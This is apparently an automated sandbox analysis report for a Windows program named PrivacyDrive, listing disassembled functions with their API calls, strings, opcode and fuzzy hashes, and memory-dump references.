                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FileNameOpen_memset
                                • String ID: !@$X
                                • API String ID: 4292185452-4222592482
                                • Opcode ID: a76abb378e13449fdcfafe9f2c3942c33c81c93e09a4c2475f9e85403f6e70ac
                                • Instruction ID: 7dceb69f979cca6fbfed53a16589b53f0021b484a8bb1d32690f29921dc899b6
                                • Opcode Fuzzy Hash: a76abb378e13449fdcfafe9f2c3942c33c81c93e09a4c2475f9e85403f6e70ac
                                • Instruction Fuzzy Hash: 3EA11570608380CBE774CF24C848B9BBBE5BF85308F104A2EE59D87291DB75A458CB97
                                Function 0045D560 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 213COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: swprintf
                                • String ID: %02X$P[$string too long
                                • API String ID: 233258989-3140238815
                                • Opcode ID: 578cadafdf5bdef974289bf4a010da483039d6b53be4da2b58917b0b2a0fc817
                                • Instruction ID: deeda1d00bbab7e01c028f3a80b60ca0d6727138760f4b33598e385c614afaa8
                                • Opcode Fuzzy Hash: 578cadafdf5bdef974289bf4a010da483039d6b53be4da2b58917b0b2a0fc817
                                • Instruction Fuzzy Hash: 8F71C230A00704DBCB34DF28C94566AB7B6FF45716F100A1FE8569B292DB38A949CB59
                                Function 0040E530 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON
                                Download Yara Rule
                                APIs
                                • _memmove.LIBCMT ref: 0040E5A4
                                  • Part of subcall function 004FFB4F: std::exception::exception.LIBCMT ref: 004FFB62
                                  • Part of subcall function 004FFB4F: __CxxThrowException@8.LIBCMT ref: 004FFB77
                                • _memmove.LIBCMT ref: 0040E699
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                • String ID: invalid string position$string too long
                                • API String ID: 1300846289-4289949731
                                • Opcode ID: 26c3fdafe75fd5700024fccce8ccdf70aea2c0196db8092c2fac52977c37c98c
                                • Instruction ID: aa4102e58c6c43286d0ccc458aa3b3cdb30541468fe92a7b965e58d71fef123c
                                • Opcode Fuzzy Hash: 26c3fdafe75fd5700024fccce8ccdf70aea2c0196db8092c2fac52977c37c98c
                                • Instruction Fuzzy Hash: C951D4313006149BCB24DEAEED8086AB7AAFF917543500E3FE545DB390DB35E825C7A8
                                Function 0040A600 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 4104443479-4289949731
                                • Opcode ID: 64a0c07c99e04949df89832e99d8116ab603dda18bbbef98413db6cc4c0f47db
                                • Instruction ID: a69163b2e96fa2249711881a697165a54b844723daba2c190f5e4f7669f899f2
                                • Opcode Fuzzy Hash: 64a0c07c99e04949df89832e99d8116ab603dda18bbbef98413db6cc4c0f47db
                                • Instruction Fuzzy Hash: E05172317003099BCF24DE28C98489E77B6FF85304724893FE8559B390D739E966CB9A
                                Function 00466060 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 170windowCOMMON
                                Download Yara Rule
                                APIs
                                • SetForegroundWindow.USER32(00000000), ref: 0046628C
                                • SetActiveWindow.USER32(00000000), ref: 004662A6
                                • SetFocus.USER32(00000000), ref: 004662C0
                                  • Part of subcall function 004753C0: VirtualProtect.KERNEL32(HjG,?,00000020,00000000,7563D392), ref: 0047540A
                                  • Part of subcall function 004753C0: VirtualProtect.KERNEL32(HjG,?,00000000,00000000,00000002,HjG,?,00000000), ref: 00475435
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ProtectVirtualWindow$ActiveFocusForeground
                                • String ID: 1u
                                • API String ID: 2697890781-2817233150
                                • Opcode ID: fdb71d3ed828612fed05d932ae2677de9f0da05e9d6dd450146f6a7cbc748e72
                                • Instruction ID: a87d1e2915a41647f854ad2c7d0632d5b1ebbb119fa8b5f8ed265caea2f7a64d
                                • Opcode Fuzzy Hash: fdb71d3ed828612fed05d932ae2677de9f0da05e9d6dd450146f6a7cbc748e72
                                • Instruction Fuzzy Hash: DF611C349012188BDB54EF65C869BAEB3B1FF45308F1181EED80AA7391DB795E84CF45
                                Function 00402790 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 157COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FileNameOpen_memset
                                • String ID: !@$X
                                • API String ID: 4292185452-4222592482
                                • Opcode ID: a38f51fdbcb7fc8cbabbf669187ea15d033308ed89bf1e9eb2928f85d647ad00
                                • Instruction ID: e84c8c1b7a242fcf4444dc66b52b8ffc4820d3b1c0752855002ef9397a27b2dd
                                • Opcode Fuzzy Hash: a38f51fdbcb7fc8cbabbf669187ea15d033308ed89bf1e9eb2928f85d647ad00
                                • Instruction Fuzzy Hash: 7B71F8B1D00368CAEB31DF54CD4C78ABBB5BB04308F1085EAD50DA6292D7B95B88DF95
                                Function 004B0600 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 152windowCOMMON
                                Download Yara Rule
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B069C
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B07D9
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004B0812
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePeek
                                • String ID: [
                                • API String ID: 2222842502-2256786511
                                • Opcode ID: 322bef3801a2dbbe8944f4fa0cade74a7eaaa0be029c2669c8f392c14047479d
                                • Instruction ID: e8331ff369a23e48e85c885c1b2399a239b9e469568beb0b79f2965cedccf8cb
                                • Opcode Fuzzy Hash: 322bef3801a2dbbe8944f4fa0cade74a7eaaa0be029c2669c8f392c14047479d
                                • Instruction Fuzzy Hash: 14516C74600300DFD714DB58C996FA6B7A5FB48704F1845BEEA0A9B392DB747804CBA9
                                Function 004C12A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 121COMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 004C12EA
                                • GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0056C40C,?,00000001,00000000,00000000,0056C40C,?,00000001), ref: 004C13C9
                                  • Part of subcall function 004FFB7D: std::exception::exception.LIBCMT ref: 004FFB90
                                  • Part of subcall function 004FFB7D: __CxxThrowException@8.LIBCMT ref: 004FFBA5
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Exception@8FullNamePathThrow_memsetstd::exception::exception
                                • String ID: !@$invalid string position
                                • API String ID: 12894150-4214978026
                                • Opcode ID: 896a792ceaf226620ef751836e4b23eb6f03d61a4e2059098aef535d7957c07b
                                • Instruction ID: c29c8f85dea9c510691d525036f1e75d0a9a6a17f5f625b3f52d4179c928aac1
                                • Opcode Fuzzy Hash: 896a792ceaf226620ef751836e4b23eb6f03d61a4e2059098aef535d7957c07b
                                • Instruction Fuzzy Hash: 2B418F7595021C9ADB20DF55CC99BDAB7B8FF54708F0042EEE409A32A1EB786B84CF54
                                Function 00409810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102COMMON
                                Download Yara Rule
                                APIs
                                • _memmove.LIBCMT ref: 004098A0
                                  • Part of subcall function 0040C5C0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000003,000000FF,00000000,00000000,00000000,?,004098D4,?,?,?,7563D392), ref: 0040C5D2
                                  • Part of subcall function 0040C5C0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000003,000000FF,00000000,00000000,00000000,?,?,?,7563D392), ref: 0040C60A
                                  • Part of subcall function 0040AB40: __CxxThrowException@8.LIBCMT ref: 0040AC74
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$Exception@8Throw_memmove
                                • String ID: PrivacyDrive$Resources.cpp$version.xml
                                • API String ID: 1655515822-3231829631
                                • Opcode ID: 09c432cc8bc17ed105025b1ced06dc70fbb4c7c60ae0ce764be7f3f363f22b14
                                • Instruction ID: a01211494afbd47c385bde3860801278259c4b7d71102fddeb9bbb3aafefded4
                                • Opcode Fuzzy Hash: 09c432cc8bc17ed105025b1ced06dc70fbb4c7c60ae0ce764be7f3f363f22b14
                                • Instruction Fuzzy Hash: 843193B1D006169BDB11DBA48C41BAFBBB8BB45724F10022AE515B33C2E7795D0087A5
                                Function 0045E800 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 86COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: 4[P[$invalid string position$string too long
                                • API String ID: 4104443479-1793273408
                                • Opcode ID: 5ba828849452866fc430d5270b53255cbd8e7eeb9c6e05534721bd49bef666e8
                                • Instruction ID: ce345729adc13b09cb700357da100de0f7ed5ff6fb81674761350112ea965b83
                                • Opcode Fuzzy Hash: 5ba828849452866fc430d5270b53255cbd8e7eeb9c6e05534721bd49bef666e8
                                • Instruction Fuzzy Hash: 4921C331700304DBDB28AE6ED880A5ABBA9EF41755B14093FE955CB382C775E948C798
                                Function 004A5820 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfW.USER32 ref: 004A584E
                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 004A586D
                                • DeviceIoControl.KERNEL32(00000000,07770C2C,00000000,00000000,005BE2B4,00000004,?,00000000), ref: 004A58B2
                                Strings
                                • \\.\GLOBAL\PrivacyDrive, xrefs: 004A5848
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ControlCreateDeviceFilewsprintf
                                • String ID: \\.\GLOBAL\PrivacyDrive
                                • API String ID: 3081802084-2067765968
                                • Opcode ID: 36b57c087ed921fed0b425d01f848104bd70bf0e57617e5c80806c4489384c58
                                • Instruction ID: 7494380c5ccbca812f687041f90896b0c0ce1ffadd146c2848c592cade095b54
                                • Opcode Fuzzy Hash: 36b57c087ed921fed0b425d01f848104bd70bf0e57617e5c80806c4489384c58
                                • Instruction Fuzzy Hash: 5211CA34741308ABEF24DB74DD16FBA73A8EF15715F10456EBA16D72C0DE7469088B44
                                Function 004859C0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 00485A11
                                • SHGetFileInfoW.SHELL32(?,000000FF,?,000002B4,00000400), ref: 00485A30
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FileInfo_memset
                                • String ID: C:\$^>I
                                • API String ID: 2638500827-3074060033
                                • Opcode ID: f5d7f28e7ae0b51361e2dc37912bccf15cf9c2aa788c0c33e1dd5c2b0c4abe3f
                                • Instruction ID: 7cc8e9ee1074bd9663a0f1968d0639b28c62d87573a87140512be5bc3e8c282c
                                • Opcode Fuzzy Hash: f5d7f28e7ae0b51361e2dc37912bccf15cf9c2aa788c0c33e1dd5c2b0c4abe3f
                                • Instruction Fuzzy Hash: 2811A731B00218ABDB10EBA5DC46FADB7B8EB44714F0042BBF908D72D0EA746A44DB84
                                Function 004AEB40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60windowCOMMON
                                Download Yara Rule
                                APIs
                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,00000000,00000000,00000000,0000000C,0000000C,?,004AF444), ref: 004AEB60
                                • LocalFree.KERNEL32(00000000), ref: 004AEB9C
                                • LocalFree.KERNEL32(00000000), ref: 004AEBC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FreeLocal$FormatMessage
                                • String ID: 0026
                                • API String ID: 803548167-3620602821
                                • Opcode ID: 4f28324bbeb6e20af9e7cd83a43d30934ef9b69ba64b6d07cfa8f98e51e6d176
                                • Instruction ID: 7a06000c86aeb33bb578875d5468381478c41e39b497c2d58616c8b13f67acd7
                                • Opcode Fuzzy Hash: 4f28324bbeb6e20af9e7cd83a43d30934ef9b69ba64b6d07cfa8f98e51e6d176
                                • Instruction Fuzzy Hash: 4E01D6317803147BEB309B44EC0BFAA7A68DB01B62F100255FE05B62E0F6B16D50A795
                                Function 00424600 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,?,?,?,?,?,0053A0F8,000000FF), ref: 0042463D
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001,?,?,?,?,?,?,?,?,?,?,0053A0F8,000000FF), ref: 00424655
                                • GdipDeleteStringFormat.GDIPLUS(00000000, - - - -,00000000,00000000,?,?,00000000,?,FF323232), ref: 004246B2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FormatGdipString$AlignCreateDeleteLine
                                • String ID: - - - -
                                • API String ID: 2084024313-344715758
                                • Opcode ID: 97e33a1792a53acda723ecc13f237b07042b9f0a6aa92eccae55c5c72e4364c0
                                • Instruction ID: cf0d635ac4439fc5101e54e632b722e79c54ec9e93b75e42b6859e8e9b21946c
                                • Opcode Fuzzy Hash: 97e33a1792a53acda723ecc13f237b07042b9f0a6aa92eccae55c5c72e4364c0
                                • Instruction Fuzzy Hash: A8219A75208342EFC714CF14CC05F9ABBE8FB89720F004A2EB9A5922D0EB74A508CB56
                                Function 004A5760 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNEL32(?,7563D392,00000002,<,X,00000000,005499CE,000000FF,?,0041D91F), ref: 004A57A3
                                • DeleteCriticalSection.KERNEL32(?,7563D392,00000002,<,X,00000000,005499CE,000000FF,?,0041D91F), ref: 004A57C6
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
